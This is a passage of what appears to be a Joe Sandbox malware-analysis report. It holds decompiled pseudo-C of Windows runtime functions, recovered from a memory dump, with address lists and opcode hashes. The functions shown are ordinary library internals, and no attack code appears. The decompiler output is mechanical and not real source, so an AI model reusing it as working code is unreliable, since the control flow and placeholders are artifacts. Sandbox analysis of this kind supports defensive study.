				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E010DF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E010DF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L010C4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                          0x010b7672
                                          0x010b767f
                                          0x010b7689
                                          0x010b76de
                                          0x010b76de
                                          0x010b768b
                                          0x010b7691
                                          0x010b7693
                                          0x010b7697
                                          0x00000000
                                          0x010b7699
                                          0x010b76a8
                                          0x00000000
                                          0x010b76aa
                                          0x010b76ad
                                          0x010b76b1
                                          0x00000000
                                          0x010b76b3
                                          0x010b76b3
                                          0x010b76b5
                                          0x010b76ba
                                          0x010b76bc
                                          0x010b76bc
                                          0x010b76c0
                                          0x00000000
                                          0x010b76c2
                                          0x010b76ce
                                          0x010b76ce
                                          0x010b76c0
                                          0x010b76b1
                                          0x010b76a8
                                          0x010b7697
                                          0x010b76d9

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction ID: 1bed590c8614d49bf8c104bee4346368f418628467552869ba9004c1a8bff86a
                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction Fuzzy Hash: B0018832700219AFD7309E5ECC91EDB7BADEBC8660B154574BA49CB294DA70DD0187A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010A9080 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E010A9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x11985ec;
				E010C2280(_t48, 0x11985ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E010BFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x119538c; // 0x771a6828
					if( *_t84 != 0x1195388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x117f6e8);
						E010FD0E8(0x11985ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E011788F5(_t80, _t85, 0x1195388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x11986c0; // 0xb507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x11986b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E010C2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E011788F5(0x11985ec, _t85, 0x1195388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E010EAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x119b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x11984c0;
																			if(_t82 >=  *0x11984c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01179063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E010A922A(_t99);
										_t64 = E010C7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01178B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x11986c0; // 0xb507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x11986b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x11986bc;
													_t87 = 0x11986b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E010A9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x11986c4;
												_t87 = 0x11986c0;
												L27:
												E010D9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E010FD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1195388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x119538c = _t51;
						goto L6;
					}
				}
			}




















                                          0x010a9082
                                          0x010a9083
                                          0x010a9084
                                          0x010a9085
                                          0x010a9087
                                          0x010a9096
                                          0x010a9098
                                          0x010a9098
                                          0x010a909e
                                          0x010a90a8
                                          0x010a90e7
                                          0x010a90e7
                                          0x010a90aa
                                          0x010a90b0
                                          0x010a90b7
                                          0x010a90bd
                                          0x010a90dd
                                          0x010a90e6
                                          0x010a90bf
                                          0x010a90bf
                                          0x010a90c7
                                          0x010a90cf
                                          0x010a90f1
                                          0x010a90f2
                                          0x010a90f4
                                          0x010a90f5
                                          0x010a90f6
                                          0x010a90f7
                                          0x010a90f8
                                          0x010a90f9
                                          0x010a90fa
                                          0x010a90fb
                                          0x010a90fc
                                          0x010a90fd
                                          0x010a90fe
                                          0x010a90ff
                                          0x010a9100
                                          0x010a9102
                                          0x010a9107
                                          0x010a910c
                                          0x010a9110
                                          0x010a9113
                                          0x010a9115
                                          0x010a9136
                                          0x010a913f
                                          0x010a9143
                                          0x011037e4
                                          0x011037e4
                                          0x010a9117
                                          0x010a9117
                                          0x010a911d
                                          0x00000000
                                          0x010a911f
                                          0x010a911f
                                          0x010a9125
                                          0x00000000
                                          0x010a9127
                                          0x010a912d
                                          0x010a9130
                                          0x010a9134
                                          0x010a9158
                                          0x010a915d
                                          0x010a9161
                                          0x010a9168
                                          0x01103715
                                          0x010a916e
                                          0x010a916e
                                          0x010a9175
                                          0x010a9177
                                          0x010a917e
                                          0x010a917f
                                          0x010a9182
                                          0x010a9182
                                          0x010a9187
                                          0x010a9187
                                          0x010a918a
                                          0x010a918d
                                          0x010a918f
                                          0x010a9192
                                          0x010a9195
                                          0x010a9198
                                          0x010a9198
                                          0x010a9198
                                          0x010a919a
                                          0x00000000
                                          0x00000000
                                          0x0110371f
                                          0x01103721
                                          0x01103727
                                          0x0110372f
                                          0x01103733
                                          0x01103735
                                          0x01103738
                                          0x0110373b
                                          0x0110373d
                                          0x01103740
                                          0x00000000
                                          0x01103746
                                          0x01103746
                                          0x01103749
                                          0x00000000
                                          0x0110374f
                                          0x0110374f
                                          0x01103751
                                          0x01103757
                                          0x01103759
                                          0x0110375c
                                          0x0110375c
                                          0x0110375e
                                          0x0110375e
                                          0x01103761
                                          0x01103764
                                          0x00000000
                                          0x00000000
                                          0x01103766
                                          0x01103768
                                          0x011037a3
                                          0x011037a3
                                          0x011037a5
                                          0x011037a7
                                          0x011037ad
                                          0x011037b0
                                          0x011037b2
                                          0x011037bc
                                          0x011037c2
                                          0x011037c2
                                          0x011037b2
                                          0x010a9187
                                          0x010a9187
                                          0x010a918a
                                          0x010a918d
                                          0x010a918f
                                          0x010a9192
                                          0x010a9195
                                          0x00000000
                                          0x010a9195
                                          0x00000000
                                          0x0110376a
                                          0x0110376a
                                          0x0110376a
                                          0x0110376c
                                          0x0110376c
                                          0x0110376f
                                          0x01103775
                                          0x00000000
                                          0x00000000
                                          0x01103777
                                          0x01103779
                                          0x01103782
                                          0x01103787
                                          0x01103789
                                          0x01103790
                                          0x01103790
                                          0x0110378b
                                          0x0110378b
                                          0x0110378b
                                          0x01103792
                                          0x01103795
                                          0x00000000
                                          0x01103795
                                          0x00000000
                                          0x01103779
                                          0x01103798
                                          0x00000000
                                          0x01103798
                                          0x00000000
                                          0x01103768
                                          0x0110379b
                                          0x0110379b
                                          0x01103751
                                          0x01103749
                                          0x00000000
                                          0x01103740
                                          0x010a91a0
                                          0x010a91a3
                                          0x010a91a9
                                          0x010a91b0
                                          0x00000000
                                          0x010a91b0
                                          0x010a9187
                                          0x010a91b4
                                          0x010a91b4
                                          0x010a91bb
                                          0x010a91c0
                                          0x010a91c5
                                          0x010a91c7
                                          0x011037da
                                          0x010a91cd
                                          0x010a91cd
                                          0x010a91cd
                                          0x010a91d2
                                          0x010a91d5
                                          0x010a9239
                                          0x010a9239
                                          0x010a91d7
                                          0x010a91db
                                          0x010a91e1
                                          0x010a91e7
                                          0x010a91fd
                                          0x010a9203
                                          0x010a921e
                                          0x010a9223
                                          0x00000000
                                          0x010a9205
                                          0x010a9205
                                          0x010a9208
                                          0x010a920c
                                          0x010a9214
                                          0x010a9214
                                          0x010a920c
                                          0x010a91e9
                                          0x010a91e9
                                          0x010a91ee
                                          0x010a91f3
                                          0x010a91f3
                                          0x010a91f3
                                          0x010a91e7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010a9134
                                          0x010a9125
                                          0x010a911d
                                          0x010a914e
                                          0x010a90d1
                                          0x010a90d1
                                          0x010a90d3
                                          0x010a90d6
                                          0x010a90d8
                                          0x00000000
                                          0x010a90d8
                                          0x010a90cf

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9a846817ebdf1a0df974f1c3b6e43ba1dcf03e55d145e8e9c725993e98b4ef5c
                                          • Instruction ID: 6df93e7a5b0812b5da4b77e9c4aec1e1b5073e24bc9e55bcc5cf0b249450b8b2
                                          • Opcode Fuzzy Hash: 9a846817ebdf1a0df974f1c3b6e43ba1dcf03e55d145e8e9c725993e98b4ef5c
                                          • Instruction Fuzzy Hash: 6C01F4726052059FD36A8F58D840B15BBEAEF41364F218066E2519B692C370DC81CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113C450 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E0113C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E010E9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E010E95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E010E95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E010E95D0();
				return L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                          0x0113c458
                                          0x0113c45d
                                          0x0113c466
                                          0x0113c468
                                          0x0113c469
                                          0x0113c46a
                                          0x0113c46b
                                          0x0113c46e
                                          0x0113c46f
                                          0x0113c471
                                          0x0113c476
                                          0x0113c476
                                          0x0113c47c
                                          0x0113c47e
                                          0x0113c480
                                          0x0113c480
                                          0x0113c483
                                          0x0113c484
                                          0x0113c486
                                          0x0113c488
                                          0x0113c48f
                                          0x0113c491
                                          0x0113c493
                                          0x0113c493
                                          0x0113c48f
                                          0x0113c498
                                          0x0113c49e
                                          0x0113c4ad
                                          0x0113c4ad
                                          0x0113c4b2
                                          0x0113c4b4
                                          0x0113c4cd

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction ID: 8bac43da4db4e5d6296c8158ab72582dc9bd3a5f0a79fc744dbc238f772d1e7f
                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction Fuzzy Hash: 8A019672140606BFE725AF69CC84EA2FB6DFF94754F004525F25452560C721ECA0CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01174015 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E01174015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E010C2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E010C2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x11986ac);
					E010AF900(0x11986d4, _t28);
					E010BFFB0(0x11986ac, _t28, 0x11986ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E010BFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                          0x0117401a
                                          0x0117401e
                                          0x01174023
                                          0x01174028
                                          0x01174029
                                          0x0117402b
                                          0x0117402f
                                          0x01174043
                                          0x01174046
                                          0x01174051
                                          0x01174057
                                          0x0117405f
                                          0x01174062
                                          0x01174067
                                          0x0117406f
                                          0x0117407c
                                          0x0117407c
                                          0x0117408c
                                          0x0117408c
                                          0x01174097

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a7b940c2c45b3a9f1b5d48c9d7e65b923a3df73b19873e6e32ea178154973d72
                                          • Instruction ID: a81478f3c6289dbb44b8b7b0f32f264a8711893f2e403752d14e6475a53a81bc
                                          • Opcode Fuzzy Hash: a7b940c2c45b3a9f1b5d48c9d7e65b923a3df73b19873e6e32ea178154973d72
                                          • Instruction Fuzzy Hash: C1018F7224194A7FD715AF69CD84E97F7ACFF55A60B000229F54887A51CB24EC11CAE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116138A Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 61%
                                          			E0116138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x119d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E010EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E010C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                          0x0116138a
                                          0x0116138a
                                          0x01161399
                                          0x011613a3
                                          0x011613a8
                                          0x011613aa
                                          0x011613b5
                                          0x011613bb
                                          0x011613c3
                                          0x011613c6
                                          0x011613c9
                                          0x011613d4
                                          0x011613e6
                                          0x011613d6
                                          0x011613df
                                          0x011613df
                                          0x011613f1
                                          0x011613f2
                                          0x011613f4
                                          0x011613f9
                                          0x0116140e

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bcd88d652b2163fbd0b01ef7476a7078c552920837ee4a6c394aad23bde76282
                                          • Instruction ID: 4f8a5456fb37ed0f80e6f1d60041c095033d8f17145533c623a5c66a559d7811
                                          • Opcode Fuzzy Hash: bcd88d652b2163fbd0b01ef7476a7078c552920837ee4a6c394aad23bde76282
                                          • Instruction Fuzzy Hash: E5019271A04209AFCB14DFA9D845EAEBBB8EF44710F044066B911EB280D6749A40CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011614FB Relevance: .0, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 61%
                                          			E011614FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x119d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E010EFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E010C7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                          0x011614fb
                                          0x011614fb
                                          0x0116150a
                                          0x01161514
                                          0x01161519
                                          0x0116151b
                                          0x01161526
                                          0x0116152c
                                          0x01161534
                                          0x01161537
                                          0x0116153a
                                          0x01161545
                                          0x01161557
                                          0x01161547
                                          0x01161550
                                          0x01161550
                                          0x01161562
                                          0x01161563
                                          0x01161565
                                          0x0116156a
                                          0x0116157f

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46591b733184263d145b579fc2fb1564a35a5ff67c10f3e478c9d2af7dd16933
                                          • Instruction ID: 92b7021269968d03f9d329e85b5b74d40bd128ca2132638aae6b56da6e2e0f34
                                          • Opcode Fuzzy Hash: 46591b733184263d145b579fc2fb1564a35a5ff67c10f3e478c9d2af7dd16933
                                          • Instruction Fuzzy Hash: B1019271A00249AFCB14DFA9D845EEEBBB8EF45700F444066F915EB280D674DA40CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010A58EC Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E010A58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x119d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1085c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E010A5943() != 0 &&  *0x1195320 > 5) {
					E01127B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01127B5E( &_v28, _t28);
					_t11 = E01127B9C(0x1195320, 0x108bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E010EB640(_t11, _t17, _v8 ^ _t29, 0x108bf15, _t27, _t28);
			}















                                          0x010a58fb
                                          0x010a58fe
                                          0x010a5906
                                          0x010a590a
                                          0x010a593c
                                          0x010a593c
                                          0x010a590c
                                          0x010a590c
                                          0x010a5911
                                          0x00000000
                                          0x010a5913
                                          0x010a5913
                                          0x010a5913
                                          0x010a5911
                                          0x010a591d
                                          0x01101035
                                          0x0110103c
                                          0x0110103f
                                          0x01101056
                                          0x01101056
                                          0x010a593b

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ebe79751e20a46e0e2e5fe4d1763fd01fe0c07727ca793789a3eed01d55df322
                                          • Instruction ID: 55d9a137a2884655eaf224d2b6d7b2c7b0464043f70a3ece3ed2e7248b7909de
                                          • Opcode Fuzzy Hash: ebe79751e20a46e0e2e5fe4d1763fd01fe0c07727ca793789a3eed01d55df322
                                          • Instruction Fuzzy Hash: CF01D431A04105EBCB18EAA9DC009AF77A8FB51230F8400A9DA95AB284DF20DD01C650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010BB02A Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010BB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E010C7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01127016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                          0x010bb037
                                          0x010bb039
                                          0x010bb03b
                                          0x010bb040
                                          0x0110a60e
                                          0x00000000
                                          0x00000000
                                          0x0110a61d
                                          0x010bb04b
                                          0x010bb04e
                                          0x0110a627
                                          0x0110a634
                                          0x00000000
                                          0x00000000
                                          0x0110a641
                                          0x0110a653
                                          0x0110a643
                                          0x0110a64c
                                          0x0110a64c
                                          0x0110a65b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0110a66c
                                          0x010bb057
                                          0x010bb057
                                          0x010bb057
                                          0x010bb046
                                          0x010bb046
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction ID: d06120eb433172afed0745a2744b03677beadeb28a8733c897db3b9a5f401aa4
                                          • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                          • Instruction Fuzzy Hash: BA018472610A809FE327875CD9C4FBA7BE8EF95750F0900A1FA55CB691D768DC40C621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01171074 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01171074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
